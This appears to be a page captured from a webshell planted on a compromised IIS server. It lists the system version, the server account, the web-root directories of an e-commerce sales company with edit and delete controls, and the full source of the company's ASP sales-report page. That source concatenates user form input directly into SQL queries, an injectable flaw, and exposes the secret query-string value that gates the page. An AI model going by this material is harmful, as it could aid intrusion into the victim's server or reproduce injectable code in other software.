Webshell Akmal archtte id
System:
Microsoft Windows NT 10.0.20348.0
Server:
Microsoft-IIS/10.0
User:
buyyou
Directory:
C:
\
MyData
\
WWW
\
asc365
\
Name
Size
Type
Actions
ASC365_CANADA
-
Directory
Rename
Delete
ASC365_Store01
-
Directory
Rename
Delete
aspnet_client
-
Directory
Rename
Delete
CompanyImage
-
Directory
Rename
Delete
TJGS_USA
-
Directory
Rename
Delete
zhijian
-
Directory
Rename
Delete
Memo.inc
0 bytes
.inc
Edit
Rename
Delete
web.config
213 bytes
.config
Edit
Rename
Delete
<%@LANGUAGE="VBSCRIPT" CODEPAGE="936"%> <%Response.Charset="gb2312"%> <!--#include file="include/conn.asp" --> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=gb2312"> <meta name="robots" content="noindex,nofollow"> <script type="text/javascript" src="js/echarts.min.js" charset="utf-8"></script> <script type="text/javascript" src="http://code.jquery.com/jquery-1.12.2.js"></script> <title>ASC���ʹ�˾</title> <style> table{ border: solid 1px #000000; } table tr td{ border-Bottom: dotted 1px #000000; border-top: dotted 1px #000000; border-right: dotted 1px #000000; border-left-width:1px; border-left-color:#000000; } .box{ border-left-width:3px; border-left-color:#FF0000; border-Bottom: dotted 1px #000000; border-top: dotted 1px #000000; border-right: dotted 1px #000000; } @media all { /* TOC inspired by http://jashkenas.github.com/coffee-script */ #table-of-contents { font-size: 10pt; position: fixed; right: 0em; top: 0em; background: white; -webkit-box-shadow: 0 0 1em #777777; -moz-box-shadow: 0 0 1em #777777; -webkit-border-bottom-left-radius: 5px; -moz-border-radius-bottomleft: 5px; text-align: right; /* ensure doesn't flow off the screen when expanded */ max-height: 80%; overflow: auto; z-index:999; } #table-of-contents #text-table-of-contents { display: none; text-align: left; } #table-of-contents:hover #text-table-of-contents { display: block; padding: 0.5em; margin-top: -1.5em; } } /* END OF @media all */ @media screen { #table-of-contents { float: right; border: 1px solid #CCC; max-width: 50%; overflow: auto; } } </style> </head> <body style="text-align:center; margin:0 auto;"> <% flgRead = Request.Querystring("arg") if flgRead <> "Asc365NewSys" then response.end dim dianpu(1000,2) id_dp = 0 fromdate = DateAdd("m",-1,date()) todate = date() typ = "month" typdp = "001" if request.Form("submit")="submit" then fromdate = request.Form("fromdate") todate = request.Form("todate") typ = request.Form("typ") typdp = request.Form("typdp") end if 'sqldianpu = "Select (Select DISPVALUE from om_commparm where fldname = 'ecptfid' and parmvalue = ecptfid) as ecptfid ,shopname from ba_shopdf where ecptfid in " & typdp& " order by charindex(ecptfid,'001|002|022|021|024|023|041|003|051|031'),SHOPCODE" sqldianpu = "Select (Select DISPVALUE from om_commparm where fldname = 'ecptfid' and parmvalue = ecptfid) as ecptfid ,shopname from ba_shopdf where ecptfid = '" & typdp& "' order by SHOPCODE" set rsdp = server.CreateObject("adodb.recordset") rsdp.open sqldianpu,conn,1,1 do while not rsdp.eof dianpu(id_dp,0) = rsdp(0) dianpu(id_dp,1) = rsdp(1) id_dp = id_dp + 1 rsdp.movenext loop rsdp.close set rsdp = nothing dptyp = "ebay.ca" if typdp="001" then dptyp = "ebay.ca" if typdp="002" then dptyp = "ebay.com" if typdp="022" then dptyp = "amazon.ca" if typdp="021" then dptyp = "amazon.com" if typdp="024" then dptyp = "walmart.ca" if typdp="023" then dptyp = "walmart.com" if typdp="041" then dptyp = "aliexpress.com" if typdp="003" then dptyp = "Website" if typdp="051" then dptyp = "local" if typdp="031" then dptyp = "Others" 'sql = "exec ShopSale '" & fromdate & "','" & todate & "','local','" & typ & "'" %> <div style="margin:0 auto; text-align:center" id="hbzj3"> <form method="post" action="" align="center" name="prdmsg"> <table width="800" border="1" style="border-collapse: collapse" align="center"> <tr> <td nowrap>�ӣ�<input type="text" name="fromdate" value="<%=fromdate%>"></td> <td nowrap>����<input type="text" name="todate" value="<%=todate%>"></td> <td nowrap>�������ͣ� <select name="typdp"> <option value="001" <%if typdp = "001" then%>selected="selected"<%end if%>>ebay.ca</option> <option value="002" <%if typdp = "002" then%>selected="selected"<%end if%>>ebay.com</option> <option value="022" <%if typdp = "022" then%>selected="selected"<%end if%>>amazon.ca</option> <option value="021" <%if typdp = "021" then%>selected="selected"<%end if%>>amazon.com</option> <option value="024" <%if typdp = "024" then%>selected="selected"<%end if%>>walmart.ca</option> <option value="023" <%if typdp = "023" then%>selected="selected"<%end if%>>walmart.com</option> <option value="041" <%if typdp = "041" then%>selected="selected"<%end if%>>aliexpress.com</option> <option value="003" <%if typdp = "003" then%>selected="selected"<%end if%>>Website</option> <option value="051" <%if typdp = "051" then%>selected="selected"<%end if%>>local</option> <option value="031" <%if typdp = "031" then%>selected="selected"<%end if%>>Others</option> </select> </td> <td nowrap>��ѯ��ʽ�� <select name="typ"> <option value="day" <%if typ = "day" then%>selected="selected"<%end if%>>�����ѯ</option> <option value="week" <%if typ = "week" then%>selected="selected"<%end if%>>�����ڲ�ѯ</option> <option value="month" <%if typ = "month" then%>selected="selected"<%end if%>>���²�ѯ</option> </select> </td> <td nowrap><input type="submit" name="submit" value="submit"></td> </tr> <tr> <td colspan="5">�����۽����ն�������ͳ��,���������۵����ܽ����ݣ��Ѿ����յ��»���ת��Ϊ��Ԫ�����˿�������˿�����ͳ�ơ�</br>���˿���˻��������۵������Dz�ѯ������ܻ������۵������˿�����۵��������磺�����۵�1���Ķ���������2019-12-01���˿�����۵�1-01�������������¼�ģ�������2019-12-01�ġ�</td> </tr> </table> </form> </div> <div id="table-of-contents"> <h2>Ŀ¼</h3> <div id="text-table-of-contents"> <ul> <li> <a href="#hbzj3">ѡ��</a> <li> <a href="#dianpuheji"><%=dptyp%></a> <ul> <%for i = 0 to id_dp-1%> <li> <a href="#dianpu_<%=i%>"><%=dianpu(i,1)%></a> <%next%> </ul> </li> </ul> </div> </div> <h3 id="dianpuheji"></h3> <div id="DP" style="text-align:center;height:100%" >Loading...</div> <%for i = 0 to id_dp -1%> <h4 id="dianpu_<%=i%>"></h4> <div id="DP<%=dianpu(i,1)%>" style="text-align:center;height:100%" >Loading...</div> <%next%> </div> </body> </html> <script type="text/javascript"> <% sql = "exec ShopSale2 '" & fromdate & "','" & todate & "','" & typdp & "','" & typ & "'" dt = "[" totalamt="[" ordercnt="[" retcnt="[" retamt="[" heji="[" set rs=server.CreateObject("adodb.recordset") rs.open sql,conn,1,1 do while not rs.eof dt = dt & "'" &rs(0) & "'," totalamt = totalamt & Round(rs(2),2) & "," ordercnt = ordercnt & Round(rs(3),2) & "," retcnt = retcnt & Round(rs(4),2) & "," retamt = retamt & Round(rs(5),2) & "," heji = heji & Round(rs(6),2) & "," rs.movenext loop rs.close set rs = nothing dt = left(dt,len(dt)-1) & "]" totalamt = left(totalamt,len(totalamt)-1) & "]" ordercnt = left(ordercnt,len(ordercnt)-1) & "]" retcnt = left(retcnt,len(retcnt)-1) & "]" retamt = left(retamt,len(retamt)-1) & "]" heji = left(heji,len(heji)-1) & "]" %> //alert(<%=sql%>); var mydd = [<%=heji%>,<%=totalamt%>,<%=retamt%>,<%=ordercnt%>,<%=retcnt%>]; var dataX = <%=dt%>; var dom = document.getElementById("DP"); var myChart = echarts.init(dom); var app = {}; option = null; option = { title: { text: '<%=dptyp%> �ϼ�', left: 'center' }, tooltip: { trigger: 'axis' }, legend: { data:['�ϼƽ��','���۽��','�˿���','���۵���','�˿���˻��������۵���'], selected:{'�ϼƽ��':true,'���۽��':true,'�˿���':true,'���۵���':false,'�˿���˻��������۵���':false}, left:'center', top:"30px", }, grid: { //top: '10%', top: '60', left: '3%', right: '4%', bottom: '5%', containLabel: true }, toolbox: { feature: { dataView : {show: true, readOnly: false,title:'�鿴����'}, saveAsImage: { title: '����ΪͼƬ' } } }, xAxis: { name: '����', type: 'category', boundaryGap: false, data: dataX }, yAxis: [{ name: '���$', type: 'value', scale:'true', nameTextStyle:{ fontSize:'15' } },{ name: '������', type: 'value', scale:'true', nameTextStyle:{ fontSize:'15' } }], dataZoom:[{ startValue: dataX[0] },{ type: 'inside' }], series: [ { name: '�ϼƽ��', type:'line', yAxisIndex:0, data: mydd[0] }, { name:'���۽��', type:'line', yAxisIndex:0, data: mydd[1] }, { name:'�˿���', type:'line', yAxisIndex:0, data: mydd[2] }, { name:'���۵���', type:'line', yAxisIndex:1, data: mydd[3] }, { name:'�˿���˻��������۵���', type:'line', yAxisIndex:1, data: mydd[4] } ] }; ; if (option && typeof option === "object") { myChart.setOption(option, true); } <% for i = 0 to id_dp -1 sql = "exec ShopSale '" & fromdate & "','" & todate & "','" & dianpu(i,1) & "','" & typ & "'" dt = "[" totalamt="[" ordercnt="[" retcnt="[" retamt="[" heji="[" set rs=server.CreateObject("adodb.recordset") rs.open sql,conn,1,1 do while not rs.eof dt = dt & "'" &rs(0) & "'," totalamt = totalamt & Round(rs(2),2) & "," ordercnt = ordercnt & Round(rs(3),2) & "," retcnt = retcnt & Round(rs(4),2) & "," retamt = retamt & Round(rs(5),2) & "," heji = heji & Round(rs(6),2) & "," rs.movenext loop rs.close set rs = nothing dt = left(dt,len(dt)-1) & "]" totalamt = left(totalamt,len(totalamt)-1) & "]" ordercnt = left(ordercnt,len(ordercnt)-1) & "]" retcnt = left(retcnt,len(retcnt)-1) & "]" retamt = left(retamt,len(retamt)-1) & "]" heji = left(heji,len(heji)-1) & "]" %> var mydd = [<%=heji%>,<%=totalamt%>,<%=retamt%>,<%=ordercnt%>,<%=retcnt%>]; var dataX = <%=dt%>; var dom<%=i%> = document.getElementById("DP<%=dianpu(i,1)%>"); var myChart<%=i%> = echarts.init(dom<%=i%>); var app = {}; option<%=i%> = null; option<%=i%> = { title: { text: '<%=dianpu(i,1)%>', left: 'center' }, tooltip: { trigger: 'axis' }, legend: { data:['�ϼƽ��','���۽��','�˿���','���۵���','�˿���˻��������۵���'], selected:{'�ϼƽ��':true,'���۽��':true,'�˿���':true,'���۵���':false,'�˿���˻��������۵���':false}, left:'center', top:"30px", }, grid: { //top: '10%', top: '60', left: '3%', right: '4%', bottom: '5%', containLabel: true }, toolbox: { feature: { dataView : {show: true, readOnly: false,title:'�鿴����'}, saveAsImage: { title: '����ΪͼƬ' } } }, xAxis: { name: '����', type: 'category', boundaryGap: false, data: dataX }, yAxis: [{ name: '���$', type: 'value', scale:'true', nameTextStyle:{ fontSize:'15' } },{ name: '������', type: 'value', scale:'true', nameTextStyle:{ fontSize:'15' } }], dataZoom:[{ startValue: dataX[0] },{ type: 'inside' }], series: [ { name: '�ϼƽ��', type:'line', yAxisIndex:0, data: mydd[0] }, { name:'���۽��', type:'line', yAxisIndex:0, data: mydd[1] }, { name:'�˿���', type:'line', yAxisIndex:0, data: mydd[2] }, { name:'���۵���', type:'line', yAxisIndex:1, data: mydd[3] }, { name:'�˿���˻��������۵���', type:'line', yAxisIndex:1, data: mydd[4] } ] }; ; if (option<%=i%> && typeof option<%=i%> === "object") { myChart<%=i%>.setOption(option<%=i%>, true); } <%next conn.close set conn = nothing %> </script>